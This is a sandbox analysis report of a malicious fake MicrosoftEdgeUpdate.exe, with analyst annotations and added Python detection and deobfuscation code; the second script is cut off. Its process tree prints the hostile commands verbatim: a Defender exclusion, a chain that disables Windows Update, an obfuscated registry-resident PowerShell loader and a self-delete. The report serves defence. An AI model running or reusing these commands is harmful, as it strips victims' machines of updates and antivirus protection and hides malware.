Analysis
max time kernel: 54s
max time network: 60s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-01-2023 01:14
Behavioral task: behavioral1
Sample: MicrosoftEdgeUpdate.exe
Resource: win7-20220901-en
Note: this task header names the win7 resource, while the Analysis block above and the YARA hit under Signatures (behavioral2) belong to the win10v2004 run; the rest of this page reports that run.
General
Target: MicrosoftEdgeUpdate.exe
Size: 4.9MB
MD5: 8223e55c97c61478aa4230b2ca498a38
SHA1: a42c6d401fbf798806c5fe85c47cc047c189e486
SHA256: 496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
SHA512: 5a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
SSDEEP: 98304:NKB0rS8yY+gIpexlkt2GguS8qth97fOMFz7lFrL8XE:8BaQgGft2hqeh97fOmXlFk
Malware Config
Signatures
-
Modifies security service (2 TTPs, 5 IoCs)
Processes (description / ioc / process):
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1  reg.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo  reg.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters  reg.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security  reg.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0  reg.exe
Drops file in Drivers directory (1 IoC)
Processes (description / ioc / process):
  File opened for modification  C:\Windows\system32\drivers\etc\hosts  MicrosoftEdgeUpdate.exe
Possible privilege escalation attempt (2 IoCs)
Processes (pid / process):
  4220  takeown.exe
  928  icacls.exe
Note: the sample is already able to delete HKLM service keys, so no privilege is gained here. takeown and icacls prepare %SystemRoot%\System32\WaaSMedicSvc.dll for the rename that follows in the same cmd.exe chain (see the process tree); the purpose is to keep the Windows Update Medic service from repairing what the chain breaks, i.e. defence evasion.
Stops running service(s) (3 TTPs)
-
Processes (resource / yara_rule):
  behavioral2/memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmp  vmprotect
  (the vmprotect rule matched a 9.5MB region of PID 2272, MicrosoftEdgeUpdate.exe; the dump itself is listed under Downloads)
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes (description / ioc / process):
  Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  MicrosoftEdgeUpdate.exe
Modifies file permissions (1 TTP, 2 IoCs)
Processes (pid / process):
  4220  takeown.exe
  928  icacls.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow / ioc):
  10  ip-api.com
Suspicious use of SetThreadContext (1 IoC)
Processes (description / pid / process / target pid / target process):
  Set thread context  2272 MicrosoftEdgeUpdate.exe  ->  4792 conhost.exe
  (together with the WriteProcessMemory calls into 4792 and the 344KB image mapped at 0x0000000140000000 in that process, listed under Downloads, this is the pattern of process hollowing; the hollowed conhost.exe is the process that then writes the dialersvc .job files)
Drops file in Windows directory (4 IoCs)
Processes (description / ioc / process):
  File created  C:\Windows\Tasks\dialersvc32.job  conhost.exe
  File opened for modification  C:\Windows\Tasks\dialersvc32.job  conhost.exe
  File created  C:\Windows\Tasks\dialersvc64.job  conhost.exe
  File opened for modification  C:\Windows\Tasks\dialersvc64.job  conhost.exe
  (.job files under C:\Windows\Tasks are legacy scheduled-task definitions; the 32/64 pair presumably corresponds to the two top-level powershell.EXE launches, one from SysWOW64 and one from System32, in the process tree)
Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes (pid / process):
  2816  sc.exe
  4032  sc.exe
  452  sc.exe
  540  sc.exe
  3616  sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Caveat: the second sentence is the sandbox's generic description of this signature. Nothing else in this report (no mass file writes or renames, no ransom note) supports a ransomware classification; the observed behaviour is disabling Windows Update, keeping the host awake, and persisting through the dialersvc32/dialersvc64 .job tasks and the registry-resident dialerstager loader.
-
Modifies registry key (1 TTP, 9 IoCs)
Processes (pid / process):
  2276  reg.exe
  4116  reg.exe
  2372  reg.exe
  4896  reg.exe
  912  reg.exe
  4808  reg.exe
  2184  reg.exe
  1196  reg.exe
  4292  reg.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid / process):
  4976  powershell.exe
  4976  powershell.exe
  2272  MicrosoftEdgeUpdate.exe
  1692  powershell.exe
  1692  powershell.exe
Suspicious use of AdjustPrivilegeToken (12 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege  4976  powershell.exe
  Token: SeDebugPrivilege  2272  MicrosoftEdgeUpdate.exe
  Token: SeShutdownPrivilege  532  powercfg.exe
  Token: SeCreatePagefilePrivilege  532  powercfg.exe
  Token: SeShutdownPrivilege  4016  powercfg.exe
  Token: SeCreatePagefilePrivilege  4016  powercfg.exe
  Token: SeShutdownPrivilege  3112  powercfg.exe
  Token: SeCreatePagefilePrivilege  3112  powercfg.exe
  Token: SeShutdownPrivilege  3708  powercfg.exe
  Token: SeCreatePagefilePrivilege  3708  powercfg.exe
  Token: SeTakeOwnershipPrivilege  4220  takeown.exe
  Token: SeDebugPrivilege  1692  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (pid process -> target pid target process; the sandbox recorded each write below twice, the conhost.exe write four times):
  2272 MicrosoftEdgeUpdate.exe -> 4976 powershell.exe
  2272 MicrosoftEdgeUpdate.exe -> 4248 cmd.exe
  2272 MicrosoftEdgeUpdate.exe -> 1496 cmd.exe
  4248 cmd.exe -> 2816 sc.exe
  4248 cmd.exe -> 4032 sc.exe
  1496 cmd.exe -> 532 powercfg.exe
  4248 cmd.exe -> 452 sc.exe
  1496 cmd.exe -> 4016 powercfg.exe
  4248 cmd.exe -> 540 sc.exe
  1496 cmd.exe -> 3112 powercfg.exe
  4248 cmd.exe -> 3616 sc.exe
  1496 cmd.exe -> 3708 powercfg.exe
  4248 cmd.exe -> 2276 reg.exe
  4248 cmd.exe -> 4808 reg.exe
  4248 cmd.exe -> 2184 reg.exe
  4248 cmd.exe -> 1196 reg.exe
  4248 cmd.exe -> 4292 reg.exe
  4248 cmd.exe -> 4220 takeown.exe
  4248 cmd.exe -> 928 icacls.exe
  4248 cmd.exe -> 4116 reg.exe
  4248 cmd.exe -> 2372 reg.exe
  4248 cmd.exe -> 4896 reg.exe
  4248 cmd.exe -> 912 reg.exe
  4248 cmd.exe -> 2216 schtasks.exe
  4248 cmd.exe -> 4820 schtasks.exe
  4248 cmd.exe -> 1504 schtasks.exe
  4248 cmd.exe -> 3716 schtasks.exe
  4248 cmd.exe -> 4940 schtasks.exe
  4248 cmd.exe -> 1140 schtasks.exe
  4248 cmd.exe -> 3592 schtasks.exe
  2272 MicrosoftEdgeUpdate.exe -> 4792 conhost.exe
Caveat: a parent writing into a child it has just created is the normal CreateProcess pattern, so the cmd.exe entries are noise. The 2272 -> 4792 conhost.exe entry is the one of interest: four writes paired with the SetThreadContext call above.
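The signatures above (Stops running service(s), Modifies security service, Launches sc.exe, Modifies file permissions, Modifies registry key) are all produced by one cmd.exe chain whose steps are visible in the process command lines below: sc stop and reg delete on the update services, takeown/icacls on WaaSMedicSvc.dll, the WindowsUpdate\AU policy values, schtasks /DISABLE on the update tasks, powercfg timeouts set to 0, and the choice/Del self-delete. The following is an added example, not part of the sandbox report or of the sample, of a small rule set that recognises that chain from command lines alone. The rule names, the "three distinct update-kill steps" verdict threshold and the benign control lines are my own; the malicious sample lines are copied from the process tree on this page.

```python
import re

# Service names the cmd.exe chain on this page stops and deletes; the rules key on them.
_UPDATE_SVC = r"(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"

# One compiled rule per step of the chain. Rule names are my own, not sandbox signature names.
RULES = {
    "stop_update_service": re.compile(
        r"\bsc(?:\.exe)?\s+stop\s+" + _UPDATE_SVC + r"\b", re.I),
    "delete_update_service_key": re.compile(
        r"\breg(?:\.exe)?\s+delete\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\" + _UPDATE_SVC + r"\b", re.I),
    "waasmedic_dll_tamper": re.compile(
        r"\b(?:takeown|icacls)(?:\.exe)?\b.*\bWaaSMedicSvc\.dll\b", re.I),
    "disable_update_policy": re.compile(
        r"\breg(?:\.exe)?\s+add\s+HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\b"
        r".*\b(?:NoAutoUpdate|AUOptions|AutoInstallMinorUpdates|NoAutoRebootWithLoggedOnUsers)\b", re.I),
    "disable_update_task": re.compile(
        r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"\\Microsoft\\Windows\\'
        r'(?:WindowsUpdate|UpdateOrchestrator)\\[^"]*"\s+/DISABLE\b', re.I),
    "powercfg_never_sleep": re.compile(
        r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I),
    "self_delete_via_choice": re.compile(r"\bchoice\b.*&\s*del\b", re.I),
}

# Steps that, taken together, amount to disabling Windows Update. Three of them is the
# verdict threshold chosen here; tune it to taste.
UPDATE_KILL_CHAIN = {
    "stop_update_service", "delete_update_service_key", "waasmedic_dll_tamper",
    "disable_update_policy", "disable_update_task",
}

SAMPLE_COMMAND_LINES = [
    # copied from the process tree on this page
    r"sc stop UsoSvc",
    r"sc stop WaaSMedicSvc",
    r"sc stop wuauserv",
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f",
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f",
    r"takeown /f C:\Windows\System32\WaaSMedicSvc.dll",
    r"icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q",
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f",
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE',
    r"powercfg /x -standby-timeout-ac 0",
    r'"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"',
    # constructed benign lines (not from the page) that the rules must not fire on
    r"sc query wuauserv",
    r"sc stop Spooler",
    r"reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate",
    r"powercfg /x -standby-timeout-ac 30",
]


def classify(cmdline):
    """Set of rule names that fire on one process command line."""
    return {tag for tag, rx in RULES.items() if rx.search(cmdline)}


def triage(cmdlines):
    """Aggregate over the command lines of a process tree and return a verdict."""
    hits = {}
    for line in cmdlines:
        for tag in classify(line):
            hits.setdefault(tag, []).append(line)
    steps = UPDATE_KILL_CHAIN & set(hits)
    if len(steps) >= 3:
        verdict = "windows-update-tampering"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "tags": sorted(hits), "hits": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_COMMAND_LINES)
    print(result["verdict"])
    for tag in result["tags"]:
        print(f"  {tag}: {len(result['hits'][tag])} line(s)")
```

The rules are deliberately narrow (only the five services this sample touches, only the WindowsUpdate and UpdateOrchestrator task folders) so that a single `sc stop Spooler` or an administrator's `reg query` does not fire; the verdict comes from several steps of the same chain appearing in one tree, which is what separates this from routine administration.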
Processes
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe  [level 1]
  "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 2]
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="
  decoded (base64 over UTF-16LE): <#hb#> Add-MpPreference <#pdcp#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#rb#> -Force <#liy#>
  i.e. a Microsoft Defender path exclusion for the whole user profile and the whole system drive; the <#...#> blocks are empty comments inserted to pad the string.
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe  [level 2]
  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  summary: stops and then deletes the service definitions of Update Orchestrator (UsoSvc), Windows Update Medic (WaaSMedicSvc), Windows Update (wuauserv), BITS and Delivery Optimization (dosvc); takes ownership of WaaSMedicSvc.dll, grants Everyone (S-1-1-0) full control and renames it so the Medic service cannot restore the deleted services; writes the WindowsUpdate\AU policy values (NoAutoUpdate=1 disables automatic updating outright); and disables the Windows Update and Update Orchestrator scheduled tasks. rename is a cmd builtin, which is why it has no child process entry below.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe  [level 3]
  sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [level 3]
  sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [level 3]
  sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [level 3]
  sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [level 3]
  sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe  [level 3]
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe  [level 3]
  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe  [level 3]
  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe  [level 3]
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [level 3]
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe  [level 3]
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe  [level 2]
  "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  (a timeout of 0 means never; on mains and on battery the host will neither sleep nor hibernate)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exe  [level 3]
  powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [level 3]
  powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [level 3]
  powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [level 3]
  powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exe  [level 2]
  C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 2]
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe  [level 2]
  "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"
  (choice with a 3-second default answer acts as a sleep so the dropper has exited before Del removes it)
-
C:\Windows\system32\choice.exe  [level 3]
  choice /C Y /N /D Y /T 3
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE  [level 1]
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  deobfuscated (the -f format operator, string concatenation and backtick-split names resolved): Set-Variable 6To ([type]'Reflection.Assembly'); $Dlr4S = [type]'Microsoft.Win32.Registry'; $6To::Load((Get-Item Variable:Dlr4S).Value::LocalMachine.OpenSubKey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($null,$null)
  i.e. the 32-bit PowerShell loads a .NET assembly stored as the registry value HKLM\SOFTWARE\dialerstager and calls its entry point, so the payload never exists as a file. Level 1 means it was not spawned by the sample; given the name it is presumably the dialersvc32.job task written by conhost.exe.
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  [level 1]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  (the same registry-resident loader script as the SysWOW64 launch above, run from the 64-bit PowerShell; it reads HKLM\SOFTWARE\dialerstager and invokes the assembly's entry point, presumably via dialersvc64.job)
-
C:\Windows\System32\dllhost.exe  [level 1]
  C:\Windows\System32\dllhost.exe /Processid:{5ef4d8bd-ce93-4d6f-8e36-7cbacd175ae2}
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  [level 1]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHoAbwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGgAZQAjAD4A"
  decoded (base64 over UTF-16LE): <#zo#> Start-Process -FilePath 'C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe' -Verb RunAs <#he#>
  i.e. a relaunch of a MicrosoftEdgeUpdate.exe under C:\Program Files\Microsoft\EdgeUpdater\ with -Verb RunAs, which requests elevation through UAC; the directory name imitates the Microsoft Edge updater. That copy is not among the dropped files listed in this report.
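The PowerShell launches in the tree above hide their real commands in two ways: the -EncodedCommand values are base64 over UTF-16LE text padded with empty <# #> comment blocks, and the two scheduled-task launches build every cmdlet and type name at run time with the -f format operator, string concatenation and backtick-split identifiers. The following is an added example, not part of the sandbox report or of the sample, that decodes and flattens exactly the strings copied from this page and then pulls out the registry value the loader reads its assembly from. The regular expressions cover only the tricks this sample uses (they are not a general PowerShell deobfuscator) and the hive-abbreviation map is my own.

```python
import base64
import re

# Copied verbatim from the process tree on this page (not constructed).
ENC_DEFENDER_EXCLUSION = "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="
ENC_RUNAS_RELAUNCH = "PAAjAHoAbwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGgAZQAjAD4A"
OBFUSCATED_LAUNCHER = r'''.(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})'''


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_comment_blocks(ps):
    """Remove <# ... #> block comments (dead text used to pad the string) and tidy whitespace."""
    return re.sub(r"\s+", " ", re.sub(r"<#.*?#>", "", ps, flags=re.S)).strip()


# ("{1}{0}" -f 'eT','S')        -> "SeT"
_FORMAT_EXPR = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)""")
# ("vARI"+"Ab"+"lE"+":DlR4S")   -> "vARIAblE:DlR4S"
_CONCAT_EXPR = re.compile(r"""\(\s*("[^"]*"(?:\s*\+\s*"[^"]*")+)\s*\)""")
# "EnT`Ryp`OINt" -> "EnTRypOINt": a backtick before a letter that is not one of
# PowerShell's escape letters (0 a b e f n r t u v) is a no-op used to split names.
_STRAY_BACKTICK = re.compile(r"`(?=[A-Zcdghijklmopqswxyz])")


def _resolve_format(m):
    args = re.findall(r"'([^']*)'", m.group(2))
    return '"' + re.sub(r"\{(\d+)\}", lambda i: args[int(i.group(1))], m.group(1)) + '"'


def _resolve_concat(m):
    return '"' + "".join(re.findall(r'"([^"]*)"', m.group(1))) + '"'


def deobfuscate(ps):
    """Flatten the three tricks the dialersvc launcher uses, innermost first."""
    text = ps.replace('\\"', '"')  # the sandbox shows the command line with escaped quotes
    text = _FORMAT_EXPR.sub(_resolve_format, text)
    text = _CONCAT_EXPR.sub(_resolve_concat, text)
    return _STRAY_BACKTICK.sub("", text)


_HIVES = {"localmachine": "HKLM", "currentuser": "HKCU"}  # abbreviation map is my own


def loader_registry_path(flattened):
    """Registry value the flattened launcher loads its assembly from, as HIVE\\key\\value."""
    hive = re.search(r'::"?(LocalMachine|CurrentUser)"?', flattened, re.I)
    key = re.search(r'"OpenSubKey"\.Invoke\("([^"]+)"\)', flattened, re.I)
    val = re.search(r'"GetValue"\.Invoke\("([^"]+)"\)', flattened, re.I)
    if not (hive and key and val):
        return None
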